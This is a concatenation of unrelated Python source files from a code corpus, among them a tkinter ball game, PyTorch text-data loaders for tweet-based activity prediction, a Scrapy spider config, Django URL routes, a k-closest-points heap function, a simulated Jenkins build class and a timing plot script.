self.canvas.move(self.id, self.x, self.y)
pos = self.canvas.coords(self.id) # 获取坐标
if pos[1] <= 0:
self.y = 3
if pos[3] >= self.canvas_height:
self.y = -3
if self.hit_paddle(pos) == True:
self.y = -3
if pos[0] <= 0:
self.x = 3
if pos[2] >= self.canvas_width:
self.x = -3
# 把小球加入主循环
while 1:
ball.draw()
tk.update_idletasks()
tk.update()
time.sleep(0.01)
| StarcoderdataPython |
6419113 | """Shared fixtures for test modules"""
import sys
import os
import emily
import pytest
curdir = os.path.dirname(__file__)
data_dir = os.path.join(curdir,'data')
@pytest.fixture
def app():
more_brains = [os.path.join(data_dir,'tests.json')]
session_vars_path = os.path.join(data_dir,'session_vars_test.json')
app = emily.start_emily(more_brains=more_brains,disable_emily_defaults=True,session_vars_path=session_vars_path,emily_port=8008)
return app | StarcoderdataPython |
6506420 | <reponame>steve-wilson/activity_prediction
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
# MODIFIED BY <NAME>, 2018
import os
import pathlib
import numpy as np
import torch
import random
def get_batch(batch, word_vec, emb_dim=300):
# sent in batch in decreasing order of lengths (bsize, max_len, word_dim)
lengths = np.array([len(x) for x in batch])
max_len = np.max(lengths)
embed = np.zeros((max_len, len(batch), emb_dim))
for i in range(len(batch)):
for j in range(len(batch[i])):
embed[j, i, :] = word_vec[batch[i][j]]
return torch.from_numpy(embed).float(), lengths
def get_word_dict(sentences):
# create vocab of words
word_dict = {}
for sent in sentences:
for word in sent.split():
if word not in word_dict:
word_dict[word] = ''
word_dict['<s>'] = ''
word_dict['</s>'] = ''
word_dict['<p>'] = ''
return word_dict
def get_glove(word_dict, glove_path):
# create word_vec with glove vectors
word_vec = {}
with open(glove_path) as f:
for line in f:
word, vec = line.split(' ', 1)
if word in word_dict:
word_vec[word] = np.array(list(map(float, vec.split())))
print('Found {0}(/{1}) words with glove vectors'.format(
len(word_vec), len(word_dict)))
return word_vec
def get_glove_vocab(glove_path):
vocab = set([])
with open(glove_path) as glove:
for line in glove.readlines():
word, vec = line.split(' ',1)
vocab.add(word)
return vocab
def build_vocab(sentences, glove_path):
word_dict = get_word_dict(sentences)
word_vec = get_glove(word_dict, glove_path)
print('Vocab size : {0}'.format(len(word_vec)))
return word_vec
def load_vocab(vocab_path):
vocab = set([])
with open(vocab_path) as vocab_file:
for line in vocab_file.readlines():
vocab.add(line.strip())
return vocab
def build_vocab_over_dir(data_path, glove_path, vocab_file_name):
vocab_path = data_path.rstrip(os.sep) + os.sep + vocab_file_name
if os.path.exists(vocab_path):
vocab = load_vocab(vocab_path)
else:
glove_vocab = get_glove_vocab(glove_path)
vocab = set([])
for subset in ['train','dev','test']:
for text_dir in ['tweets','profiles']:
for f in os.listdir(data_path + os.sep + subset + os.sep + text_dir):
with open(data_path + os.sep + subset + os.sep + text_dir + os.sep + f) as text_file:
for line in text_file.readlines():
words = line.strip().split()
vocab |= set([w.lower().strip("""#()[]{}-=~.,?!:;"'""") for w in words if w.lower().strip("""#()[]{}-=~.,?!:;"'""") in glove_vocab])
with open(vocab_path,'w') as vocab_file:
for word in vocab:
vocab_file.write(word+'\n')
embeddings = get_glove(vocab, glove_path)
return embeddings
def get_nli(data_path):
s1 = {}
s2 = {}
target = {}
dico_label = {'entailment': 0, 'neutral': 1, 'contradiction': 2}
for data_type in ['train', 'dev', 'test']:
s1[data_type], s2[data_type], target[data_type] = {}, {}, {}
s1[data_type]['path'] = os.path.join(data_path, 's1.' + data_type)
s2[data_type]['path'] = os.path.join(data_path, 's2.' + data_type)
target[data_type]['path'] = os.path.join(data_path,
'labels.' + data_type)
s1[data_type]['sent'] = [line.rstrip() for line in
open(s1[data_type]['path'], 'r')]
s2[data_type]['sent'] = [line.rstrip() for line in
open(s2[data_type]['path'], 'r')]
target[data_type]['data'] = np.array([dico_label[line.rstrip('\n')]
for line in open(target[data_type]['path'], 'r')])
assert len(s1[data_type]['sent']) == len(s2[data_type]['sent']) == \
len(target[data_type]['data'])
print('** {0} DATA : Found {1} pairs of {2} sentences.'.format(
data_type.upper(), len(s1[data_type]['sent']), data_type))
train = {'s1': s1['train']['sent'], 's2': s2['train']['sent'],
'label': target['train']['data']}
dev = {'s1': s1['dev']['sent'], 's2': s2['dev']['sent'],
'label': target['dev']['data']}
test = {'s1': s1['test']['sent'], 's2': s2['test']['sent'],
'label': target['test']['data']}
return train, dev, test
def alliter(path):
p = pathlib.Path(path)
for sub in p.iterdir():
if not sub.is_dir():
yield sub.name
# alternative-- before each epoch begins, read all of the file names, shuffle,
# then save to a tmp file that the generator iterates through
def alliter2(path):
tmp_path = "/scratch/mihalcea_fluxg/steverw/tmp/shuffled_files.out"
files = os.listdir(path)
random.shuffle(files)
with open(tmp_path,'w') as tmp_file:
tmp_file.write('\n'.join(files))
del files
with open(tmp_path,'r') as tmp_file:
for line in tmp_file:
yield line.strip()
def alliter3(path):
files = os.listdir(path)
random.shuffle(files)
for f in files:
yield f
# output should yield sets of files in the data path that are batch size
# (or smaller if there are not enough files left)
# data_path: where to get the files
# data_subset: which subdir to look in
def batch_generator(data_path, batch_size, data_subset):
batch = []
# this assumes that the profiles directory contains all of the users that will be included
# in the subset of data that we are currently batching our way through
all_files_generator = alliter3(data_path + os.sep + data_subset + os.sep + 'profiles')
for f in all_files_generator:
batch.append(f)
if len(batch) == batch_size:
yield batch
batch = []
# make sure to give the one final, smaller batch, if there were things leftover
if batch:
yield batch
#done -- make set of tweets randomly shuffle per user
# done -- make aggregator function robust to missing profiles/tweets (reduce batch size)
# done -- add into code with torch dataloader to see if this improves the performance!
# done -- test with max tweets = 100 first! why not start with that?
# done -- test with fewer hidden units first!
class APDataSet(torch.utils.data.Dataset):
def __init__(self, data_path, word_vec, word_emb_dim, n_classes, use_values=False, subset='train', max_num_tweets=100, use_activities=False, no_profiles=False, no_tweets=False, lmap={}, shuffle_input=True):
self.files = os.listdir( os.path.join(data_path,subset,'profiles') )
self.word_vec = word_vec
self.word_emb_dim = word_emb_dim
self.n_classes = n_classes
self.use_values = use_values
#self.subset = subset
self.max_num_tweets = max_num_tweets
self.prefix = os.path.join(data_path,subset) + os.sep
self.use_activities = use_activities
self.no_profiles = no_profiles
self.no_tweets = no_tweets
self.lmap = lmap
self.shuffle_input = shuffle_input
def __getitem__(self, index):
userid = self.files[index]
tweet_mat = None
tweet_lengths = None
profile_vec = []
profile_length = 0
values = []
values_length = 0
target = None
doc_type = 'activities' if self.use_activities else 'tweets'
if not self.no_tweets:
with open(self.prefix + doc_type + os.sep + userid) as tweet_file:
tweets = [prepare_sentence(tweet,self.word_vec) for tweet in tweet_file.readlines()]
tweets = [tweet for tweet in tweets if tweet]
# is this causing problems? do we need the same set of tweets each time in order to correctly learn?
if self.shuffle_input:
random.shuffle(tweets)
if self.max_num_tweets:
tweets = tweets[:self.max_num_tweets]
tweet_lengths = np.array([len(tweet) for tweet in tweets])
max_len = np.max(tweet_lengths)
num_tweets = len(tweets)
tweet_mat = np.zeros((max_len, num_tweets, self.word_emb_dim))
# to_delete = []
for i in range(num_tweets):
length_i = tweet_lengths[i]
# instead of deleting, treat empty tweets as if they contained 1 word
# which we represent with a vector of all 0s
if length_i <= 0:
# to_delete.append(i)
tweet_lengths[i] = 1
for j in range(length_i):
tweet_mat[j, i, :] = self.word_vec[tweets[i][j]]
# for del_idx in sorted(to_delete, reverse=True):
# tweet_lengths = np.delete(tweet_lengths, del_idx)
# tweet_mat = np.delete(tweet_mat,del_idx,1)
tweet_mat = torch.from_numpy(tweet_mat).float()
if not self.no_profiles:
with open(self.prefix + 'profiles' + os.sep + userid) as profile_file:
profile = prepare_sentence(profile_file.read().strip(),self.word_vec)
profile_length = len(profile)
if profile_length <= 0:
print("emtpy profile for user:",userid)
profile_vec = np.zeros((profile_length, self.word_emb_dim))
for j in range(profile_length):
profile_vec[j, :] = self.word_vec[profile[j]]
#profile_vec = torch.from_numpy(profile_vec).float()
# Values: just one vector
if self.use_values:
with open(self.prefix + 'values' + os.sep + userid) as values_file:
values = [float(x) for x in values_file.read().strip().split()]
values_length = len(values)
#values = np.array(values)
#values = torch.from_numpy(values).float()
# Target: correct cluster id
with open(self.prefix + 'clusters_' + str(self.n_classes) + os.sep + userid) as targets_file:
ids = [int(x) for x in targets_file.read().strip().split()]
# new way, just use first id as the target value
target = ids[0]
if self.lmap:
target = self.lmap[target]
#TODO remove this:
return (tweet_mat, tweet_lengths, profile_vec, profile_length, values, values_length, target)
def __len__(self):
return len(self.files)
# def __add__(self, other):
#
# raise NotImplementedError
# #TODO?
# expected input: tweet_mat, tweet_lengths, profile_vec, profile_length, values, values_length, target
def APcollate_fn(batch):
# print("Initial batch size:",len(batch))
# initial_batch_size = len(batch)
tweet_mats = []
tweet_length_arrs = []
profile_vec_list = []
profile_lengths = []
values = []
values_lengths = []
targets = []
for item in batch:
# if item[3] > 0:
if item[0] is not None:
tweet_mats.append(item[0])
tweet_length_arrs.append(item[1])
profile_vec_list.append(item[2])
profile_lengths.append(item[3])
if item[4] and item[5]:
values.append(item[4])
values_lengths.append(item[5])
targets.append(item[6])
batch_size = len(targets)
# print("Final batch size:",batch_size)
# assert len(tweet_mats) == batch_size
# assert len(profile_vec_list) == batch_size
# assert initial_batch_size == batch_size
# tweets should be good to go
# need to do padding for profiles
profile_mat = torch.Tensor()
max_profile_length = max(profile_lengths)
if max_profile_length:
profile_mat = np.zeros((max_profile_length, batch_size, profile_vec_list[0].shape[1]))
for i in range(batch_size):
if profile_lengths[i]:
for j in range(profile_lengths[i]):
profile_mat[j,i,:] = profile_vec_list[i][j]
# make empty profiles appear as length 1 containing only an all-zero vector word
# otherwise rnns will crash...
else:
profile_lengths[i] = 1
profile_mat = torch.from_numpy(profile_mat).float()
# only need to include values if they are nonempty
if values and values_lengths:
values = np.array(values)
values = torch.from_numpy(values).float()
values_lengths = np.array(values_lengths)
# targets should be good to go
return tweet_mats, tweet_length_arrs, profile_mat, np.array(profile_lengths), values, values_lengths, np.array(targets)
def prepare_sentence(sentence, word_vec):
return [w.lower().strip("""#()[]{}-=~.,?!:;"'""") for w in sentence.strip().replace(r'\n','\n').split() if w.lower().strip("""#()[]{}-=~.,?!:;"'""") in word_vec]
# this is where we actually load the data into memory
# output needs to be: tweets_batch, tweets_length, profile_batch, profile_length
# values_batch, values_length, target_batch
def load_batch(data_path, files_list, word_vec, word_emb_dim, n_classes, use_values=False, subset='train', max_num_tweets=100):
prefix = data_path + os.sep + subset + os.sep
batch_size = len(files_list)
# Tweets: list of tensors
# NOTE: instead of using batch_size for dimension 1, use num_tweets
# Tweet_lengths: list of arrays of lengths of the tweets
tweet_mats = []
tweet_length_arrs = []
# print(subset)
for f_num,f in enumerate(files_list):
# print("file",f)
with open(prefix + 'tweets' + os.sep + f) as tweet_file:
single_user_tweets = [prepare_sentence(t,word_vec) for t in tweet_file.readlines()]
single_user_tweets = [t for t in single_user_tweets if t!=[]]
if max_num_tweets:
single_user_tweets = single_user_tweets[:max_num_tweets]
single_user_lengths = np.array([len(t) for t in single_user_tweets])
max_len = np.max(single_user_lengths)
num_tweets = len(single_user_tweets)
tweet_mat = np.zeros((max_len, num_tweets, word_emb_dim))
to_delete = []
for i in range(num_tweets):
length_i = len(single_user_tweets[i])
# print(length_i)
if length_i <= 0:
to_delete.append(i)
for j in range(length_i):
tweet_mat[j, i, :] = word_vec[single_user_tweets[i][j]]
# if to_delete:
# print("deleting",to_delete)
for del_idx in sorted(to_delete, reverse=True):
single_user_lengths = np.delete(single_user_lengths,del_idx)
tweet_mat = np.delete(tweet_mat,del_idx,1)
# print(single_user_lengths.shape)
# print(single_user_lengths)
# print(tweet_mat.shape)
# print(tweet_mat)
tweet_mats.append(torch.from_numpy(tweet_mat).float())
tweet_length_arrs.append(single_user_lengths)
if len(tweet_mats) != f_num + 1:
print("Batch count off when processing file:",f,"len(tweet_mats), len(tweet_length_arrs:",len(tweet_mats),len(tweet_length_arrs))
print("User_tweets:",single_user_tweets)
print("Will try to avoid an error by skipping this user...")
files_list.remove(f)
#tweet_mats = torch.stack(tweet_mats)
# Profiles: just one tensor
# Profiles_lengths: array of lenghts of profiles
profiles = []
for f in files_list:
with open(prefix + 'profiles' + os.sep + f) as profile_file:
profiles.append(prepare_sentence(profile_file.read(),word_vec))
profile_lengths = np.array([len(p) for p in profiles])
max_len = np.max(profile_lengths)
# counts zeros
# num_zeros = np.count_nonzero(profile_lengths==0)
profile_mat = np.zeros((max_len, batch_size, word_emb_dim))
to_delete = []
for i in range(batch_size):
length_i = len(profiles[i])
if length_i <= 0:
to_delete.append(i)
for j in range(length_i):
profile_mat[j, i, :] = word_vec[profiles[i][j]]
for del_idx in to_delete:
profile_lengths = np.delete(profile_lengths,del_idx)
profile_mat = np.delete(profile_mat,del_idx,1)
# also need to delete the tweets for this user since we will no longer use them
print("Skipping user because of missing profile",files_list[del_idx],"profile:",profiles[del_idx])
files_list.pop(del_idx)
tweet_mats.pop(del_idx)
tweet_length_arrs.pop(del_idx)
# now, things *should* line up
print("Verify that sizes match-- len(tweet_mats), len(tweet_length_arrs), profile_mat.shape",len(tweet_mats), len(tweet_length_arrs), profile_mat.shape)
profile_mat = torch.from_numpy(profile_mat).float()
# Values: just one matrix
values = []
values_lengths = []
if use_values:
for f in files_list:
with open(prefix + 'values' + os.sep + f) as values_file:
values.append([float(x) for x in values_file.read().strip().split()])
values_lengths = [len(v) for v in values]
values_lengths = np.array(values_lengths)
values = np.array(values)
values = torch.from_numpy(values).float()
# Targets: one hot encodings (used to be)
# targets = np.zeros((batch_size, n_classes))
# Targets: correct cluster ids, in a list, one for each item in the batch
targets_list = []
for i,f in enumerate(files_list):
with open(prefix + 'clusters_' + str(n_classes) + os.sep + f) as targets_file:
ids = [int(x) for x in targets_file.read().strip().split()]
# old way-- assuming that we were going to do multilabel predictions
# targets[[i]*len(ids),ids] = 1
# new way, just use first id as the target value
targets_list.append(ids[0])
targets = np.array(targets_list)
if len(tweet_mats) != batch_size:
print("Warning, tweet mats is only size:",len(tweet_mats),'!')
return tweet_mats, tweet_length_arrs, profile_mat, profile_lengths, values, values_lengths, targets
# sent in batch in decreasing order of lengths (bsize, max_len, word_dim)
lengths = np.array([len(x) for x in batch])
max_len = np.max(lengths)
embed = np.zeros((max_len, len(batch), emb_dim))
for i in range(len(batch)):
for j in range(len(batch[i])):
embed[j, i, :] = word_vec[batch[i][j]]
return torch.from_numpy(embed).float(), lengths
def load_weights(path):
with open(path) as wfile:
weights = [float(x) for x in wfile.read().split()]
return torch.tensor(weights)
def load_map(path, do_load):
lmap = {}
if do_load:
with open(path) as mfile:
for line in mfile:
if line:
parts = line.strip().split()
lmap[int(parts[0])] = int(parts[1])
return lmap
def save_weights(w,path):
with open(path,'w') as wfile:
wfile.write(' '.join([str(wgt) for wgt in w]))
def save_map(m,path):
with open(path,'w') as mfile:
for k,v in m.items():
mfile.write(str(k) + ' ' + str(v) + '\n')
def load_train_targets(datasetpath, n_classes, map_labels):
targets_dir = os.path.join(datasetpath,'train','clusters_' + str(n_classes))
y = []
lmap = {}
mmin = 0
for f in os.listdir(targets_dir):
with open(os.path.join(targets_dir,f)) as tfile:
targets = [int(x) for x in tfile.read().strip().split()]
if map_labels:
t = targets[0]
if t not in lmap:
lmap[t] = mmin
mmin += 1
y.append(lmap[t])
else:
y.append(targets[0])
return y, lmap
# set weights to 1/count_in_training_data instead of 1 for everything
def get_weight_tensor(params):
weights_path = params.datasetpath.rstrip(os.sep) + os.sep + 'weights_' + str(params.n_classes) + '.out'
map_path = params.datasetpath.rstrip(os.sep) + os.sep + 'map_' + str(params.n_classes) + '.out'
if os.path.exists(weights_path) and (not params.map_labels or os.path.exists(map_path)):
return load_weights(weights_path), load_map(map_path, params.map_labels)
else:
y,l_map = load_train_targets(params.datasetpath, params.n_classes, params.map_labels)
n_samples = len(y)
y = np.array(y)
counts = np.bincount(y)
#print(counts, counts.shape)
weights = n_samples / (params.n_classes * counts)
weights[weights==np.inf] = 0
save_weights(weights, weights_path)
if l_map:
save_map(l_map, map_path)
return (torch.from_numpy(weights).float(), l_map)
| StarcoderdataPython |
8124159 | <filename>scraper/storage_spiders/golmartvn.py
# Auto generated by generator.py. Delete this line if you make modification.
from scrapy.spiders import Rule
from scrapy.linkextractors import LinkExtractor
XPATH = {
'name' : "//h1[@class='productName']",
'price' : "//div[@id='ShowPrice']/@data-url",
'category' : "",
'description' : "//span[@class='grid sDes']/p",
'images' : "//img[@class='imgDetailBig']/@src | //div[@class='bimg']/a/@href | //td[@class='bigimg']/div[@class='bimg']/a/@href",
'canonical' : "",
'base_url' : "",
'brand' : ""
}
name = 'golmart.vn'
allowed_domains = ['golmart.vn']
start_urls = ['http://www.golmart.vn/']
tracking_url = ''
sitemap_urls = ['']
sitemap_rules = [('', 'parse_item')]
sitemap_follow = []
rules = [
Rule(LinkExtractor(allow=['/SanPham.*']), 'parse_item'),
Rule(LinkExtractor(allow=['/DanhSach.*']), 'parse'),
#Rule(LinkExtractor(), 'parse_item_and_links'),
]
| StarcoderdataPython |
5006971 | <filename>dj_lab/mysite/mysite/urls.py
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('bands/', include('bands.urls')),
path('news/', include('news.urls')),
path('polls/', include('polls.urls')),
path('author-polls/', include('polls.urls', namespace='author-polls')),
path('publisher-polls/', include('polls.urls', namespace='publisher-polls')),
path('polls-api/', include('polls_api.urls')),
path('books/', include('books.urls')),
path('admin/', admin.site.urls),
]
| StarcoderdataPython |
260984 | <reponame>E-G-C/algorithms
"""Given a list of points, find the k closest to the origin.
Idea: Maintain a max heap of k elements.
We can iterate through all points.
If a point p has a smaller distance to the origin than the top element of a
heap, we add point p to the heap and remove the top element.
After iterating through all points, our heap contains the k closest points to
the origin.
"""
from heapq import heapify, heappushpop
def k_closest(points, k, origin=(0, 0)):
# Time: O(k+(n-k)logk)
# Space: O(k)
"""Initialize max heap with first k points.
Python does not support a max heap; thus we can use the default min heap
where the keys (distance) are negated.
"""
heap = [(-distance(p, origin), p) for p in points[:k]]
heapify(heap)
"""
For every point p in points[k:],
check if p is smaller than the root of the max heap;
if it is, add p to heap and remove root. Reheapify.
"""
for point in points[k:]:
dist = distance(point, origin)
heappushpop(heap, (-dist, point)) # heappushpop does conditional check
"""Same as:
if d < -heap[0][0]:
heappush(heap, (-d,p))
heappop(heap)
Note: heappushpop is more efficient than separate push and pop calls.
Each heappushpop call takes O(logk) time.
"""
return [point for nd, point in heap] # return points in heap
def distance(point, origin=(0, 0)):
""" Calculates the distance for a point from origo"""
return (point[0] - origin[0])**2 + (point[1] - origin[1])**2
| StarcoderdataPython |
3265070 | <filename>src/cicd_sim/buildmachine/jenkins.py
from .. util.stdoutput import StdOutput
from .. conan import Conan
from . buildstrategy_a import BuildStrategyA
class Jenkins:
""" A Jenkins simulation. It supports 'building a branch' which results in an artifact.
Depending on the 'build strategy', that artifact get's a version and may be published
to an 'artifactory'
:config: Dict that may optionally specify the following keys: `conan`, `output` and
`build_strategy`. For each key, defaults are used if they're not defined.
"""
def __init__(self, artifactory, repos, config = {}):
self._artifactory = artifactory
self._repos = repos
self._setup(config)
self._remember_built_branches = {}
self._register_build_hooks()
def _setup(self, config):
self._conan = config['conan'] if 'conan' in config else Conan()
self._output = config['output'] if 'output' in config else StdOutput()
self._build_strategy = config['build_strategy'] if 'build_strategy' in config else BuildStrategyA()
def _register_build_hooks(self):
self._repos.set_buildmachine(self)
def build(self, branch):
"""Build a Git branch.
This means:
- Execute `Conan install` to install requirements
- It creates an artifact with an identifier
- The artifact gets published to artifactory
Finally, Jenkins iterates through all repositories (i.e. 'projects')
and checks whether the new artifact will change the version that'd be
taken by `conan install` because of the newly created artifact.
"""
self._output.building(branch)
resolved_requires = self._conan.install(branch, self._artifactory.get_artifacts())
if self._build_strategy.shall_publish_artifact(branch):
artifact_version = self._build_strategy.generate_artifact_version(branch)
self._publish_artifact(branch, artifact_version)
self._remember_built_artifact(branch, resolved_requires)
self.check_repos_require_build()
def check_repos_require_build(self):
"""Check if projects needs to be rebuild becuase their 'requires' have
new artifacts. E.g. if a library artifacts get added, the application
may need a rebuild."""
for repo in self._repos.get_repos():
for branch in repo.get_branches():
resolved_requires, _ = self._conan.resolve_requires(self._artifactory.get_artifacts(), branch)
if resolved_requires and self._is_artifact_rebuild_required(branch, resolved_requires):
self.build(branch)
def _remember_built_artifact(self, branch, resolved_requires):
project_desc = branch.get_description(True)
self._remember_built_branches[project_desc] = resolved_requires
def _is_artifact_rebuild_required(self, branch, resolved_requires):
project_desc = branch.get_description(True)
branch_built_before = self._remember_built_branches.get(project_desc)
return resolved_requires != branch_built_before
def _publish_artifact(self, branch, version):
descr = branch.get_description(colorized = True)
self._output.publish(branch.get_project_name(), descr, version)
self._artifactory.publish(branch.get_project_name(), version)
| StarcoderdataPython |
4907138 | <reponame>romeorizzi/TALight
#!/usr/bin/env python3
from sys import stderr, exit
import random
from time import monotonic
import matplotlib.pyplot as plt
def plotting(data, figure_size):
"""data=(name, n, t_no_efficient, t_efficient) is a list of data to plotting."""
# plotting settings
plt.figure(figsize = figure_size)
counter = 1
for i in range(len(data)):
# extract data
name = data[i][0]
n = data[i][1]
t_no_efficient = data[i][2]
t_efficient = data[i][3]
assert len(t_no_efficient) == len(t_efficient)
diff = [t_no_efficient[i] - t_efficient[i] for i in range(len(t_no_efficient))]
# print stats
print(f'n={n}')
print(f'last_no_eff={t_no_efficient[-1]}')
print(f'last_eff={t_efficient[-1]}')
print(f'last_diff={diff[-1]}')
print()
# plotting times comparison
plt.subplot(len(data), 2, counter)
plt.title(f'{name}',fontweight="bold", loc="right")
plt.plot(n, t_no_efficient, marker = 'o', color='b', label='only_correct')
plt.plot(n, t_efficient, marker = 'o', color='g', label='also_efficient')
plt.legend(loc="upper left")
plt.xlabel('N')
plt.ylabel('times (seconds)')
plt.grid(color = 'green', linestyle = '--', linewidth = 0.5)
# plotting difference
plt.subplot(len(data), 2, counter+1)
plt.plot(n, diff, marker = 'o', color='r', label='difference')
plt.legend(loc="upper left")
plt.xlabel('N')
plt.ylabel('difference (seconds)')
plt.grid(color = 'green', linestyle = '--', linewidth = 0.5)
#update counter
counter += 2
plt.suptitle('EFFICIENCY COMPARISON',fontweight="bold")
plt.show()
| StarcoderdataPython |
4866159 |
from django.contrib import admin
from django.conf.urls import *
from django.urls import include, path
from rest_framework import routers
from rest_framework.authtoken.views import obtain_auth_token
from api import views
admin.autodiscover()
router = routers.DefaultRouter()
router.register(r'machines', views.MachineViewSet)
router.register(r'customers', views.CustomerViewSet)
urlpatterns = [
path('admin/', admin.site.urls),
url(r'^_nested_admin/', include('nested_admin.urls')),
path('', include(router.urls)),
path('api-token-auth/', obtain_auth_token, name='api_token_auth'),
]
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.